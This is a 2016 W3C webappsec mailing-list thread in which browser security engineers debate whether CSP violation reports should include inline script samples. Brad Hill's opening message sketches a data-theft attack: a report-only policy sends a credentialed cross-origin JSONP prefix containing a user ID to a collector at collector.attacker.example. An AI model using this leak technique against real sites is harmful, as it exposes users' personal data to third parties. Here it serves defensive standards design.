- From: Brad Hill <hillbrad@gmail.com>
- Date: Wed, 19 Oct 2016 17:14:35 +0000
- To: Craig Francis <craig.francis@gmail.com>, Krzysztof Kotowicz <kkotowicz@gmail.com>
- Cc: Artur Janc <aaj@google.com>, Mike West <mkwst@google.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Christoph Kerschbaumer <ckerschbaumer@mozilla.com>, Frederik Braun <fbraun@mozilla.com>, Scott Helme <scotthelme@hotmail.com>, Lukas Weichselbaum <lwe@google.com>, Michele Spagnuolo <mikispag@google.com>, Jochen Eisinger <eisinger@google.com>
- Message-ID: <CAEeYn8gZfUcrjD3S4O01xWrFAtcsq-EUe_dF--FYSBv=BkRCVw@mail.gmail.com>
Just to add my comment after discussion on today's teleconference:

I'm sympathetic to the argument that "you must trust your reporting endpoint" for inline scripts and event handlers. I'm concerned about it for non-same-origin external scripts. There are lots of "guarded" JSONP-like endpoints that I imagine have PII in the first 40 chars, e.g., something like the following, where u is a userid:

    for(;;);{u:21482823, ...

Allowing any cross-origin endpoint to request this response and dump it to a reporting endpoint of their choice would be very bad.
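To spell the attack out (a sketch only -- the hosts are made up, and it assumes reports were to include samples of external scripts, which is exactly what I'd want to avoid): an attacker serves a page under a report-only policy, so the cross-origin fetch still happens with the victim's cookies:

    Content-Security-Policy-Report-Only: script-src 'self';
        report-uri https://collector.attacker.example/csp

    <script src="https://social.example/feed.js"></script>

The browser fetches the credentialed response, records a script-src violation, and the report POSTed to collector.attacker.example would then carry the first 40 chars of the guarded JSONP body -- the for(;;);{u:21482823, ... prefix above -- to a collector of the attacker's choosing.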
-Brad

On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com> wrote:

> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>
> > URLs should not contain sensitive data, precisely because they are often relayed to third parties
>
> Hi Krzysztof,
>
> While I agree, the classic example is a password reset.
>
> As in, a link is sent to the user via email, and that link contains a sensitive token that allows someone to change the account password.
>
> That said, the token should not last long, to reduce the risk of it being exposed to 3rd parties (e.g. expiring it after use, or after a certain period of time).
>
> Craig
>
>
> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>
> 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>:
>
> On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote:
>
> On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote:
>
> On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com> wrote:
>
> Hey
>
> In the case of a third-party script having an error, what are example leaks you are worried about?
>
> The same kinds of issues that lead us to sanitize script errors for things loaded as CORS cross-origin scripts: https://html.spec.whatwg.org/#muted-errors. If the resource hasn't opted in to being same-origin with you, script errors leak data you wouldn't otherwise have access to.
>
> Thanks for the summary, Mike! It's a good overview of the issue, but I'd like to expand on the reasoning for why including the prefix of an inline script doesn't sound particularly scary to me.
>
> Thanks for fleshing out the counterpoints, Artur!
>
> Basically, in order for this to be a concern, all of the following conditions need to be met:
>
> 1. The application has to use untrusted report collection infrastructure. If that is the case, the application is already leaking sensitive data from page/referrer URLs to its collector.
>
> "Trusted" to receive URLs doesn't seem to directly equate to "trusted" to store sensitive data. If you're sure that you don't have sensitive data on your pages, great. But you were also presumably "sure" that you didn't have inline script on your pages, right? :)
>
> Keep in mind that URLs are sensitive data for most applications, and they are currently being sent in violation reports.
>
> URLs should not contain sensitive data, precisely because they are often relayed to third parties, e.g. in the referrer. If they do, that's usually considered a vulnerability by e.g. OWASP, especially if the URL is capability-bearing (IDOR <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References> is even in the OWASP Top 10). I agree that some applications disclose sensitive information in URLs, but that should not be the majority of them. I think that for a lot of applications, URLs reported through e.g. CSP violation reports are still subject to regular access control, whereas we just don't know yet whether sensitive tokens are included in script samples. It's likely some IDs are present in inline scripts, e.g. <a href=# onclick=a.select(123)>.
>
> I'm having a difficult time imagining a case where an application is okay with disclosing its URLs to a third party for the purpose of debugging violation reports, but is not okay with disclosing script prefixes for the same purpose, given that:
>
> 1) Almost all applications have sensitive data in URLs, compared to a certainly real, but less specific, risk of having inline scripts with sensitive data in their prefix, assuming it's limited to a reasonable length.
>
> Citation needed (for the "almost all" claim). I agree the risk of leaking sensitive data might be mitigated by adding a reasonable length limit.
>
> 2) URLs are disclosed much more frequently than script samples would be, because they are sent with every report (not just "inline" script-src violations). In the `referrer` field, the UA is also sending a URL of another, unrelated page, increasing the likelihood that sensitive data will appear in the report.
>
> Which is why it's a best practice not to put sensitive data in URLs, but instead to transfer it via e.g. cookies or POST parameters.
>
> 3) There is no sanitization of URL parameters in violation reports, compared to the prefixing logic we're considering for script samples.
>
> In fact, I'd be much more worried about URLs than script prefixes, because URLs leak on *any* violation (not just for script-src) and URLs frequently contain PII or authorization/capability-bearing tokens, e.g. for password reset functionality.
>
> We've talked a bit about URL leakage in https://github.com/w3c/webappsec-csp/issues/111. I recall that Emily was reluctant to apply referrer policy to the page's URL vis-à-vis the reporting endpoint, but I still think it might make sense.
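> To make that existing leak concrete, a report along these lines -- all hosts, tokens, and nonces here are invented -- is roughly what a collector already receives today on *any* violation:
>
>     {
>       "csp-report": {
>         "document-uri": "https://app.example/reset?token=3x4mpl3s3cr3t",
>         "referrer": "https://mail.example/inbox",
>         "blocked-uri": "https://evil.example/x.js",
>         "violated-directive": "script-src",
>         "original-policy": "script-src 'nonce-r4nd0m'; report-uri https://collector.example/csp"
>       }
>     }
>
> The capability-bearing reset token rides along in document-uri, with no sanitization applied.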
> 2. The application needs to have a script which includes sensitive user data somewhere in the first N characters. FWIW, in our small-scale analysis of a few hundred thousand reports, we saw ~300 inline script samples sent by Firefox (with N=40) and haven't found sensitive tokens in any of the snippets.
>
> Yup. I'm reluctant to draw too many conclusions from that data, given the pretty homogeneous character of the sites we're currently applying CSP to at Google, but I agree with your characterization of the data.
>
> Scott might have more data from a wider sampling of sites, written by a wider variety of engineering teams (though it's not clear that the terms of that site would allow any analysis of the data).
>
> I completely agree, this data is just what we had readily available -- we can certainly do a much larger analysis of script prefixes based on the search index. That said, if we're worried about the script-sample approach, perhaps not seeing any sensitive data in the first dataset we looked at could be a signal that it's worth pursuing further.
>
> 3. The offending script needs to cause a CSP violation, i.e. not have a valid nonce, meaning that the application is likely broken if the policy is in enforcing mode.
>
> 1. Report mode exists.
>
> 2. Embedded enforcement might make it more likely that XSS on a site could cause policy to be inadvertently applied to itself or its dependencies. We talked about this briefly last week, and I filed https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :)
>
> Since CSPs applied by embedded enforcement serve a very different purpose than current policies (they don't try to mitigate script injection), it would very likely be okay to just not include script-sample data for such policies. Also, embedded enforcement is still pretty far off, and the reporting problem is an issue for pretty much every site currently gathering violation reports; we should probably weigh the value of fixing CSP reporting accordingly.
>
> As a security engineer, I would consider #1 to be the real security boundary -- a developer should use a CSP collector she trusts because otherwise, even without script-sample, reports contain data that can compromise the application.
>
> That sounds like an argument for reducing the amount of data in reports, not for increasing it. I think it's somewhat rational to believe that reporting endpoints are going to have longer retention times and laxer retention policies than application databases. Data leaking from the latter into the former seems like a real risk. I agree that the URL itself already presents risks, but I don't understand how that's a justification for accepting more risk.
>
> It is an argument for using trusted infrastructure when building your application ;-) Developers are already accustomed to deciding whether to place trust in various components of their apps, whether it's the hosting platform and OS, server-side modules and libraries, or JS widgets and other embedded resources. A CSP violation endpoint is currently a security-critical part of an application because it receives URLs; people who don't trust their collection infrastructure already have insecure applications, and adding script-sample to reports does little to change this. (Note that this wouldn't hold for applications which have nothing sensitive in URLs and embed sensitive data at the beginning of inline scripts, but this doesn't seem like a common pattern.)
>
> Basically, the reluctance to include relevant debugging information in the violation report seems to be somewhat of a misplaced concern to me, because it ignores the trust relationship the application owner must already have with their report collection endpoint.
>
> Perhaps it's pertinent to take a step back and think about the reason to have reporting functionality in CSP in the first place -- after all, the mechanism could certainly work only via throwing SecurityPolicyViolation events and requiring developers to write their own logging code. The fact that this capability exists in UAs, and is not restricted to sending reports to the same origin or same "base domain" (contrary to the original proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf), indicates that CSP wants to be flexible and give developers ultimate control over the reporting functionality. Given this design choice, it seems okay to trust the developer to pick the right report URI for their application and include useful debugging data if the developer wants it; in a way, the status quo is the worst of both worlds, because it already requires the developer to fully trust the collector, but doesn't give her enough useful data to track down causes of violations.
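> For reference, that do-it-yourself alternative looks roughly like this (a minimal sketch; the /csp-logs endpoint is made up, and the `sample` field is only populated by some UAs):
>
>     document.addEventListener('securitypolicyviolation', function (e) {
>       // Forward only the fields we care about to our own same-origin collector.
>       navigator.sendBeacon('/csp-logs', JSON.stringify({
>         documentURI: e.documentURI,
>         violatedDirective: e.violatedDirective,
>         blockedURI: e.blockedURI,
>         sample: e.sample
>       }));
>     });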
> In case it helps: Lukas ran a quick analysis of the report-uri values we've seen in the wild; e.g., for the domains with CSP in the Alexa 100,000 we see the following:
>
> - 49% don't set a report-uri
> - 29% have a report-uri pointing to a relative path (/foo)
> - 10% have a report-uri pointing to the same origin, with another 1% using a sibling subdomain (foo.example.org reporting to csp.example.org)
>
> Out of the remaining ~10% which send violations to external URLs, about half point to report-uri.io and a couple of other logging services, and the rest seem to use another domain owned by the same person/organization, e.g. vine.co sends reports to twitter.com. The data for all domains in our set isn't substantially different (66% without report-uri; 24% reporting to their own domain; 10% externally). This data doesn't include all the Google ccTLDs and a couple of other big providers, and I'm sure it's missing some other domains, e.g. ones with CSP in parts of the site requiring authentication, but AFAIK it shouldn't have a systematic bias otherwise.
>
> I can easily imagine scripts that violate conditions #2 and #3, but at the same time we have not seen many examples of such scripts so far, nor have people complained about the script-sample data already being included by Firefox (AFAIK).
>
> People are generally unlikely to complain about getting more data, especially when the data's helpful and valuable. That can justify pretty much anything, though: lots of people think CORS is pretty restrictive, for instance, and probably wouldn't be sad if we relaxed it in various ways.
>
> Overall, I don't see the gathering of script samples as qualitatively different from the collection of URLs. However, if we are indeed particularly worried about script snippets, we could make this opt-in and enable the functionality only in the presence of a new keyword (report-uri /foo 'report-script-samples') and add warnings in the spec to explain the pitfalls. This way, even if I'm wrong about all of the above, we would not expose any data from existing applications.
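> Spelled out, a policy opting in under that strawman might look like the following (a sketch of the proposed syntax only -- 'report-script-samples' is just the keyword suggested above, not something UAs implement, and the nonce is made up):
>
>     Content-Security-Policy: script-src 'nonce-r4nd0m';
>         report-uri /csp-reports 'report-script-samples'
>
> Existing policies without the keyword would keep today's behavior and send no samples.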
> I suspect that such an option would simply be copy-pasted into new policies, but yes, it seems like a reasonable approach.
>
> For some background about why we're even talking about this: currently, violation reports are all but useless for both debugging and detection of the exploitation of XSS, due to the noise generated by browser extensions.
>
> I agree that this is a problem that we should solve. One way of solving it is to add data to the reports. Another is to invest more in cleaning up the reports that you get so that there's less noise. I wish browser vendors (including Chrome) spent more time on the latter, as we're actively harming users by not doing so.
>
> Yes, fixing the blocking and reporting of extension-injected scripts would certainly help (although note that "less noise" likely isn't sufficient; it really has to be zero noise), but IIRC prior discussions we've had about the topic indicated that this is an almost intractable problem, so it would be great to find alternative solutions.
>
> The script-sample approach also has several important advantages, because even without extension-related false positives, developers would have very little information about the actual cause of inline script violations (which are the majority of possible CSP problems in nonce-based policies). Sending some of the script text not only makes it possible to discard all spurious reports, but also gives the developer the crucial bit of data to find and fix actual site errors; it seems like a workable solution to the current reporting problems faced by many sites.
>
> Cheers,
> -Artur
>
> --
> Best regards,
> Krzysztof Kotowicz
Received on Wednesday, 19 October 2016 17:15:18 UTC